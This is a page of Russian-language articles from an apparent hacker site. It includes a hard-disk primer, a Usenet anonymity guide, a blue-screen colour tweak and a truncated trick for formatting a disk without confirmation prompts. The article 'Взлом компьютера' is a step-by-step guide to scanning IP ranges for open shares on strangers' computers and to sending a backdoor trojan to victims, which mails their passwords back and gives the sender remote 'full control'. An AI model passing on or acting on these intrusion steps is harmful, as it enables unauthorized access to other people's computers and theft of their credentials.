В данном случае, подтверждать ничего не придется.

Воспользуемся входными потоками.
Этот путь сложнее, но интереснее предыдущего.
Расскажу лучше как отформатировать дискету вместо жесткого диска.
Нам потребуется еще один файл (например temp.temp), в котором будут записаны все клавиши, необходимые для подтверждения. В нашем случае это "Enter,Enter,No,Enter", т.е. вам необходимо в блокноте нажать два раза Enter, написать символ n и нажать Enter еще раз, сохранить и закрыть файл.
Теперь можно приступить непосредственно к форматированию с Читать далее...

HDD для начинающих



автор: HAspiring



HDD, ПЗУ, НЖМД, жесткий диск, накопитель, "винчестер", "винт", "хард". Ни одно устройство персонального компьютера не имеет такого количества названий. Наверно потому, что мы, наделяя ответственностью за сохранность наших данных, лелеем его и любим. Ведь именно жесткому диску программист доверяет плоды своего многодневного труда, в его укромных уголках юный онанист хранит от родителей свою порноколлекцию, к нему пытаются получить доступ злобствующие хакеры. А так ли мы хорошо знаем его? Давайте разберемся.

Итак, "винчестер" представляет собой небольшую плоскую черную пластмассовую коробку с блестящей металлической крышкой. Внутри коробки есть несколько магнитных дисков насажанных на одну ось, набор считывающих/записывающих головок, привод этих головок и привод дисков, а так же набор микросхем управления и памяти. Вроде все, остальное мелочи. Кстати примечательно само название "винчестер". Где-то в 60-ые годы IBM выпустила по тем временам высокоскоростной накопитель. Он имел два диска один из которых был сменным. Оба диска были по 30 Mb. Номер разработки того диска: 30-30, что совпадало с обозначением нарезного оружия Winchester,
между прочим, довольно популярного в Америке. Вот и начали америкосы называть этот носитель "винчестером", а потом уж и весь мир. Затем название это прочно укоренилось за всеми жесткими дисками. Ну да ладно. На данный момент принцип работы накопителей фактически одинаков. Хотя надо заметить, что на рынке вскоре появятся диски, скроенные по новым
технологиям (о которых я расскажу в следующий раз). В накопителе устанавливается несколько дисков, которые разбиты на
дорожки и сектора. Однотипные, т. е. одинаково расположенные дорожки объединяются в цилиндр. Данные находятся с обоих сторон дисков, а считываются и записываются головками. Скорость вращения современных дисков довольно высокая - свыше 7000 об/мин. При нормальной работе "винта" головки не касаются дисков. Если такое дело случилось, то зачастую накопитель приходится выбрасывать. Также может случиться попадание пылинок в зазор между головкой и цилиндром. Результат - царапина и: опять таки дальнейшую
жизнь вполне вероятно "винт" проведет на помойке. Вообще надо заметить, что жесткие диски не любят сильной тряски и тем более ударов. Хотя производители год от года улучшают противоударную защиту, думаю, все же проверять ее не стоит. Ладно, не будем о грустном. О размерах и скоростях, при которых работает "винт" может дать представление пересчет некоторых величин. Если взять расстояние между головкой и диском за 1 дюйм, то все остальные значения надо будет умножить
на 200 000. Почему? Да потому, что 1 дюйм больше 5 микродюймов ровно в 200000 раз. Если кому не нравятся дюймы может сам пересчитать все в сантиметры. Итак, считаем: длина головки получится 400 м, высота - 100 м. Перемещаться она будет со скоростью 4760 км в секунду! Не слабо, да? К примеру, спутник, летящий на такой скорости по орбите Земли, совершит виток за 8 секунд!

Теперь о дорожках и секторах. Дело в том, что дорожка записи слишком велика, что бы использовать ее в качестве минимальной единицы
хранения данных. Поэтому придумали разбивать дорожки на сектора. Секторов может умещаться от 17 до 150, а то и более на одной дорожке. Их нумерация начинается с единицы, тогда как нумерация головок и цилиндров начинается с нуля. В начале каждого сектора записывается его заголовок (иногда еще говорят префикс, но мы умничать не будем). По этому заголовку определяется
начало и номер сектора. В конце сектора есть заключение (по-умному - суффикс), в котором содержится контрольная сумма, которая нужна для проверки целостности данных. Все это можно назвать служебной информацией. Данные же находятся аккурат между ними. Вся информация в заголовки записывается при форматировании. Но надо сказать, что это еще не все. Есть такая "фишка" как промежутки. Они есть как внутри секторов, так и между секторами и в них никакую полезную информацию записать нельзя. Кстати,
сектора располагаются не по порядку. Очередность их расположения одному богу известна, а точнее производителю. Зачем это сделали? Дело в том, что головка получает команду на считывание данных только из одного сектора. Затем следует команда для другого. Если бы сектора располагались один за другим, то диску пришлось сделать лишний оборот, чтобы подвести
следующий сектор под головку т. к. скорость вращения очень высокая и головка просто не успеет получить команду и найти то, что надо. А поскольку такие команды отдаются головкам в количестве нескольких миллионов, а то и
миллиардов в минуту, то можно представить, какая выгода во времени получается. Вообще то о секторах говорить можно бесконечно долго. Лучше мы пойдем дальше на север и поговорим о кластерах.

Кластерами называют ячейками размещения данных. Это наименьшая область диска, которую можно использовать для размещения информации. В чемже тогда разница между сектором и кластером? В том, что сектор - это Читать далее...

Взлом компьютера
автор: Dan





Ну что же, пришло время рассказать как можно попасть в чужой комп.
Это самый простой способ так как думать особо не надо!

Нам потребуется сканер Ip диапазона. Лично я пользуюсь Essential NetTools 3.0.

Начнем... Берем и запускаем сканер Essential NetTools 3.0. Теперь нужно определиться какой Ip диапазон следует просканировать. Для этого просто заходим в вкладку View\Local IP Addresses и смотрим свой Ip, пусть будет такой 123.333.253.12. Значит пишем первый (начальный)диапазон Ip 123.333.253.1 а второй (конечный) 123.333.253.255 И видим что сканер нашел кучу удаленных компьютеров в этом диапазоне, но большинство компов не доступно для простого проникновения (no), но есть компьютеры где написано (yes), именно в такие компьютеры мы можем попасть без труда, для этого нужно просто нажать на нем правой кнопкой мышки и щелкнуть по "open computer" и через несколько минут откроется окно где Вы увидите содержимое удаленного компьютера.
Вот и все!


Есть еще один способ. Для этого нам потребуется троян Смерть Ламера 2.6 (Lamer Die 2.6) или Anti-Lamer BackDoor (Скачайте в разделе "Троян AntiLamer"). Запускаем Редактор сервера и настраиваем троян по своему вкусу. И так, сервер готов, а да совсем забыл самое главное нужно настроить сервер чтобы троян присылал пароли Вам, так вот кидаете трояна кому ни будь и ждете пока к Вам не придет письмо от трояна.


О! Письмо пришло… Нашей радости нет конца. Пришли пароли на инет, но вспомните главное было не пароли, а доступ к компьютеру. Так вот в письме помимо пароля указывается Ip адрес компьютера и его название в сети . Вот это нам и надо. Теперь сканируем Ip диапазон который получили, только помните если Ip 213.34.56.13 то нужно сканировать диапазон 213.34.56.1 - 213.34.56.254. Вот в принципе и все. Осталось только дождаться когда жертва выйдет в интернет и запустить Death.exe, вводим Ip жертвы, подсоединяемся и получаем полный контроль над кампом!!! Удачного Вам хака!



Copyright © "HACK-INFO" "crypt@hack-info.ru"
При использовании материалов обязательна ссылка на http://hack-info.ru.

Анонимность в UseNet



Большинство людей, использующих Usenet, знают, как важно бывает скрыть свою личность. Во-первых, как только вы послали любое сообщение в любую группу новостей, ваш почтовый ящик с необычайной скоростью начинает наполняться junk mail, т.е. всяким мусором, рассказывающим, как разбогатеть за месяц, остановить выпадение волос и другой подобной дрянью. Во-вторых, ваши публично высказанные взгляды могут вызвать волну откликов, причем не только в рамках группы новостей, но и направленных напрямую автору сообщения, что не всегда желательно. В-третьих, ваши друзья, коллеги или работодатель могут натолкнуться на ваше сообщение, причем оно может им не понравиться. Короче говоря, причин может быть много, а вывод один: совсем не плохо знать, как сохранить анонимность в Usenet.

Ниже следует краткое описание методов, которыми можно воспользоваться для этой цели. Первые два метода дают вам возможность пользоваться альтернативным электронным адресом, при этом ответы на ваше сообщение в Usenet (а также junk mail) вы получать все равно будете, а вот ваша реальная личность останется скрытой. Третий метод дает полную анонимность: никакой почты вообще. Так что выбирайте тот, который больше подходит.

Метод №1
Использование коммерческой службы для отправки сообщений в группы новостей. Стоит денег, но прост в использовании. Адреса: www.nymserver.com и www.mailanon.com (последняя служба предоставляет семидневный бесплатный пробный период). Вот цитата со страницы одного из этих сайтов (переводить автору лень):

A Nymserver is a internet service that protects your real email identity behind a "fake" email address. Any mail sent to your anonymous email address will automatically be forwarded to your REAL email address. In effect, you can give out your anonymous email address and nobody can know who the real person behind that anonymous address is!

Метод №2
Получение бесплатного электронного адреса в Hotmail или NetAddress, что, по сути, равнозначно получению "фиктивного" адреса, поскольку ваше настоящее имя давать совсем не обязательно, и использование DejaNews free posting service. Метод чуть более сложен, чем первый. Никому не известно кто вы, но чтобы скрыть еще и где вы, следует воспользоваться прокси-сервером, иначе ваш IP адрес будет обнаруживать ваше географическое положение. Об использовании прокси серверов можно прочесть в статье По WWW - без следов. Другим недостатком метода является поле FROM в отправленном сообщении, поскольку в нем какое-то, пусть и фиктивное, имя фигурировать будет, например "John Johnson

JOHN@HOTMAIL.COM

".

Метод №3
Использование mail-to-news gateway в сочетании с анонимным римейлером. Mail-to-news gateway позволяет пользователям отправлять сообщения в группы новостей с использованием электронной почты, а не местного сервера новостей. Но если пользоваться этим сервисом "в лоб", то ваше имя и обратный адрес будут фигурировать в сообщении, т.к. mail-to-news gateways их не анонимизируют. Для того, чтобы достичь полной анонимности, следет использовать комбинацию анонимного римейлера и mail-to-news gateway, т.е. отправить сообщение в mail-to-news gateway с сайта такого римейлера. Это просто: отправляйтесь на такой сайт, затем к странице, позволяющей отправлять сообщения (можно воспользоваться SSL-защищенной формой), наберите ваше сообщение, а поле TO: заполните в соответствии со следующей схемой:

Для отправки сообщения, например, в группу alt.test, адрес должен быть таким:

m2n-YYYYMMDD-alt.test@alpha.jpunix.com

где YYYYMMDD - это текущая дата (год, месяц, день). Для отправки сообщения в несколько групп их названия следует разделить знаком "+". Например, для отправки сообщения в alt.test и misc.test 11 сентября 1997, адрес таков:

m2n-19970911-alt.test+misc.test@alpha.jpunix.com

Вот и все. Ваше сообщение будет выглядеть так:



Date: Thu, 11 Sep 1997 11:09:02 +0200 (MET DST)
Message-ID: <199709111009.MAA29412@basement.replay.com>
Subject: Just testing
From: nobody@REPLAY.COM (Anonymous)
Organization: Replay and Company UnLimited
X-001: Replay may or may not approve of the content of this posting
X-002: Report misuse of this automated service to



X-URL: http://www.replay.com/remailer/
Mail-To-News-Contact: postmaster@alpha.jpunix.com
Newsgroups: alt.test, misc.test

This is only a test

Как легко заметить, не малейшего следа отправителя! Следует не забывать о еще одном важном моменте. Mail-to-news gateways появляются и исчезают. Alpha.jpunix.com работает сегодня, но может исчезнуть завтра. И не забывайте попробовать, как все работает, прежде чем отправить что-либо важное!

Несколько полезных советов
Один из читателей по имени Kramer любезно дал мне несколько советов, относящихся к теме этой главы. Привожу их ниже:

* Все сообщения, отправляемый в usenet, по умолчанию сохраняются в базе данных навеки. Если вы не Читать далее...

Синий экран смерти



Итак, все, кто работает в зловредной операционной системе Windows (рассчитанной на тупых американских домохозяек), знают, что очень часто при "незначительных" глюках Windows появляется сообщение об ошибках и сообщает, что если вы нажмете Ctrl+Alt+Del система перезагрузится с потерей всех несохраненных данных, а если нажмете кнопку┘ зависнет (это подразумевается┘). Что нам делать с этим синим экраном?! Конечно┘ перекрасить! Как приятно, что даже САМ "синий экран смерти" подчиняется нам! :)

А теперь к делу.

Открываем файл system.ini (для особо одаренных объясняю, что искать его надо в папке с Windows).
Ищем строку: [386Enh].
И сразу после нее пишем:
MessageTextColor=X - цвет текста,
MessageBackColor=X - цвет фона.
Вместо X подставляем: 0 - черный, 1 - синий, 2 - зеленый, 3 - бирюзовый, 4 - красный, 5 - сиреневый, 6 - коричневый, 7 - белый, 8 - серый, 9 - ярко-синий, A - ярко-зеленый, B - ярко-бирюзовый, C - ярко-красный, D - ярко-коричневый, E - ярко-желтый, F - белый.
Сохраняем файл и перезагружаем комп.

Вот и все, можно хвастаться перед друганами нестандартно настроенной системой :)


автор: DenisVIP


Copyright © " HACK-INFO" " info@xakep.dax.ru"
При использовании материалов обязательна ссылка на http://hack-info.tk .